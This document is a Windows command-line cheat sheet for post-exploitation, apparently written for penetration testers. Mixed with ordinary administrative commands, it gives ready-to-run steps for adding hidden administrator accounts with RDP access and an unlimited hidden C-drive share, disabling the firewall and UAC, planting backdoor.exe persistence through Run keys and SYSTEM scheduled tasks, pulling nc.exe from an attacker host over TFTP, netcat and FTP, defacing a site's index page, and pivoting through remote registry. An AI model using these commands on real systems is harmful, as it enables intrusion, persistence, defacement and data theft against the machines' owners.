A List of useful command line syntax which can be used on servers to find various important information
--------------------------
View Computers, Workgroups & Domains:
--------------------------
NET VIEW
NET VIEW /DOMAIN
List Domain Controllers:
Win2K:
NETDOM QUERY /D:MyDomain DC
Find Primary DC:
NETDOM QUERY /D:MyDomain PDC
Win2k3:
DSQUERY Server
Find primary DC:
NETDOM QUERY /D:mydomain.com FSMO
----------------------
Check users logged on:
----------------------
NET SESSION | FIND "\\"
WMIC /Node:remotecomputer ComputerSystem Get UserName
Using REG.EXE:
Windows 2000|XP|2k3):
FOR /F %%A IN ('REG Query \\remotecomputer\HKU ˆ| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"' DO (FOR /F "tokens=3 delims=\" %%B IN ('REG Query "\\remotecomputer\%%A\Volatile Environment"' DO (SET LoggedinUser=%%B))
Windows 7:
FOR /F %%A IN ('REG Query \\remotecomputer\HKU /K /F "S-1-5-21-" ˆ| FINDSTR /R /B /C:"HKEY_USERS\\S-1-5-[0-9][0-9]-[0-9-]*$"' DO (' DO (FOR /F "tokens=2*" %%B IN ('REG Query "\\remotecomputer\%%~A\Volatile Environment" /V "UserName" ˆ| FIND /V ":"' DO (SET LoggedinUser=%%C))
----------
SYSTEMINFO:
----------
systeminfo
net config workstation
tasklist
taskkill [/f] /pid <pid>
taskkill [/f] /im <image_name>
qprocess
--------------
schedule tasks:
--------------
echo %time%
at
at <time+1min> /INTERACTIVE "cmd.exe"
pops a SYSTEM level shell if not disabled, scheduled tasks can also be used...
schtasks
----------
LIST USERS:
----------
whoami /all
net use
net localgroup
net localgroup <GROUP-NAME>
NET LOCALGROUP Administrators
net localgroup administrators /domain
net group “Domain Admins” /domain
net group “Enterprise Admins” /domain
net group “Domain Controllers” /domain
net group “Remote Desktop Users"
password policy info:
net accounts
net accounts /domain
----------------------------------
Find out Group Membership for user:
----------------------------------
DSQUERY USER -samid <loginname> | DSGET USER -memberof -expand
------------------------------------
Check Directory Permissions for User:
------------------------------------
CD /D d:\directory2check
SHOWACLS /Uomain\userid
------------
List Drives:
------------
fsutil fsinfo drives
------------
List Shares:
------------
net share
---------------
Reset User Pass:
---------------
NET USER <loginname> <newpassword> /DOMAIN
on Srv2k3:
DSQUERY USER -samid <loginname> | DSMOD USER -pwd <newpassword>
Now make sure password never expires:
WMIC.EXE /Node:remotecomputer Path Win32_UserAccount Where Name="user" Set PasswordExpires="FALSE"
-------------------------
ADD USER + RDP ENABLEMENT:
-------------------------
net user <USER-NAME> <PASS> /add
net localgroup administrators <USER-NAME> /add
net localgroup “Remote Desktop Users” <USER-NAME> /add
net share nothing$=C:\ /grant:<USER-NAME>,FULL /unlimited
shares C drive and grans unlimited access to it for our new admin user....
***If the server is a member of a domain, we can go a step further and add a domain level user rather than a local one. This will have more reach within the organisation that a local user will, but it will also be much more visible to the IT team of the organisation that you're testing. Simply add "/DOMAIN" after first command above to add to domain level in addition to local level
re-enable a disabled account (perhaps an old admin account ):
net user username /active:yes /domain
-------------------------------------------------------------------------------
Tunnel RDP out on another port besides default port 3389, port 443 in this case:
-------------------------------------------------------------------------------
REG ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 443 /f
simple change back to 3389 to return to default port. If you need to check if port is already in use or not you can use a quick "netstat -an | find <port#>"
**May need a restart or RDP Service restart to take affect
--------------
Firewall Info:
--------------
If you want to find out geenral info about the firewall, use this:
netsh firewall show opmode
See list of port openings:
netsh firewall show portopening
Add port opening in firewall, for port 455 for any service or program to use:
netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL
Turn off built-in Windows firewall:
netsh firewall set opmode disable
or
SC [ \\Remote_computer ] Stop SharedAccess
SC [ \\Remote_computer ] Config SharedAccess start= disabled
---------------------
NetCat File Transfers:
---------------------
Push a file from client to listener:
ncat –lv [LocalPort] > [outfile]
Listen on [LocalPort], store results in [outfile]
$ nc –w3 [TargetIPaddr] [port] < [infile]
Push [infile] to [TargetIPaddr] on [port]
Pull file from listener back to client:
$ nc –l -p [LocalPort] < [infile]
Listen on [LocalPort], prep to push [infile]
$ nc –w3 [TargetIPaddr] [port] > [outfile]
Connect to [TargetIPaddr] on [port] and retrieve [outfile]
--------------------
TFTP File Transfers:
--------------------
If it is not enabled, follow these 4 quick steps:
1 => copy %windir%\system32\dllcache\tftpd.exe %windir%\system32
2 => sc create tftpdsvc binPath= C:\Windows\System32\tftpd.exe DisplayName= "TFTP Server" start= auto
Should see: "[SC] CreateService SUCCESS"
3 => REG ADD HKLM\SYSTEM\CurrentControlSet\Services\tftpdsvc\Parameters /v Directory /t REG_SZ /d "C:\Documents and Settings\Administrator\Desktop\tftp"
4 => net start tftpdsvc
tftp [-i] [Host] [{get | put}] [Source] [Destination]
-i: Specifies binary image transfer mode (also called octet mode). In binary image mode, the file is transferred in one-byte units. Use this mode when transferring binary files. If -i is omitted, the file is transferred in ASCII mode. This is the default transfer mode. This mode converts the
end-of-line (EOL) characters to an appropriate format for the specified computer. Use this mode when transferring text files. If a file transfer is successful, the data transfer rate is displayed.
Host: Specifies the local or remote computer.
put: Transfers the file Destination on the local computer to the file Source on the remote computer. Because the TFTP protocol does not support user authentication, the user must be logged onto the remote computer, and the files must be writable on the remote computer.
get: Transfers the file Destination on the remote computer to the file Source on the local computer.
Source: Specifies the file to transfer.
Destination: Specifies where to transfer the file. If Destination is omitted, it is assumed to have the same name as Source.
/?: Displays help at the command prompt.
EXAMPLES (ATTACKER=.21 && TARGET=.30):
tftp 192.168.1.30 GET /home/hood3drob1n/defaced.html index.html
This will transfer the local file "defaced.html" from local to remote server and will re-name the file as index.html on the remote server, which was identified as 192.168.1.30
tftp -i 192.168.1.21 GET /home/hood3drob1n/evil/nc.exe
This will grab a copy of nc.exe from 192.168.1.21
tftp -i 192.168.1.30 PUT /home/hood3drob1n/evil/nc.exe /path/on/target/nc.exe
This will copy local file nc.exe to the server at 192.168.1.30
If facing newer Windows Systems (Vista, 7, or Srv2008) you might need to disable CTCP protection to get working TFTP as CTCP has been known to cause issues with timeouts (not implemented in Linux or Windows XP)
To disable enter this command: netsh interface tcp set global congestionprovider=none
TFTP Not enabled due to being newer system? No problem, re-enable using DISM
dism (Deployment Image Servicing and Management Technical) allows command line control of services, I do it via a DOS script, but this is the key:
dism /online /Enable-Feature /FeatureName:TelnetClient
dism /online /Enable-Feature /FeatureName:TFTP
-----------------------
CMD FTP Remote Download:
-----------------------
echo open <site.com> > ftpscript.txt (Optional, but if omitted the host/ip needs to be specified after script name in -s argument to identify target host properly)
echo <USER> >> ftpscript.txt
echo <PASS> >> ftpscript.txt
echo binary >> ftpscript.txt (If next line points to a .exe use this line, otherwise not needed)
echo get <FILE> >> ftpscript.txt
echo quit >> ftpscript.txt
ftp -s:ftpscript.txt
----------------------------
Set Backdoor w/Firewall hole:
----------------------------
1)
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\backdoor.exe" /f
2)
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\backdoor.exe"
3)
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\backdoor.exe" /ED 12/12/2012
--------------
Services Info:
--------------
To delete a Windows Service, simply type use the Service Control, or "sc", command with delete argument followed by the Service name
sc delete <ServiceName>
Use quotes if spaces in name:
sc delete “Apple Mobile Device”
You can use SC to query for all configured services on the box with simple command:
sc query
or
NET START
All Services on windows can be found under this registry key:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
Start/Pause/Stop/Continue a Service
SC <ServerName> Start|Pause|Stop|Continue <ServiceName>
You can omit server name and assumes on localhost, but you can also leverage this to interact with other systems services if you have elevated privileges
SC Stop Scheduler
SC Start Messenger
SC \\W2k3SRV Pause W3Svc
SC \\192.168.1.10 Continue NTfrs
----------------------
Disable UAC in Vista+:
----------------------
%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
Essentially we just set this registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
EnableLUA=0 to disable and EnableLUA=1 to re-enable UAC
-----------------
REGISTRY EDITING:
-----------------
--------------------------------------------
Query for a specific Value of a Registry Key:
--------------------------------------------
reg (QUERY, ADD, DELETE, COPY, SAVE, LOAD, UNLOAD, RESTORE, COMPARE, EXPORT, IMPORT (FLAGS)) KEY
reg <option> [\\TargetIPaddr\][RegDomain]\[Key] /v [ValueName]
Check if RDP Enabled or not:
C:\> reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
0=Enabled
1=Disabled
To re-enable RDP:
REG.exe ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
If remote registry access is available, you can try tweaking internal machines as well to further pivot:
REG.exe ADD "\\MachineName\HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
The machine typially needs to be rebooted for the change to take effect, so open a command prompt and type the following command:
shutdown -m \\srv220 -r
----------------------
Interface Device Info:
----------------------
ipconfig /all
ipconfig /displaydns
arp -a
route print
type %WINDIR%\System32\drivers\etc\hosts
------------------
Group Policy Info:
------------------
gpresult /z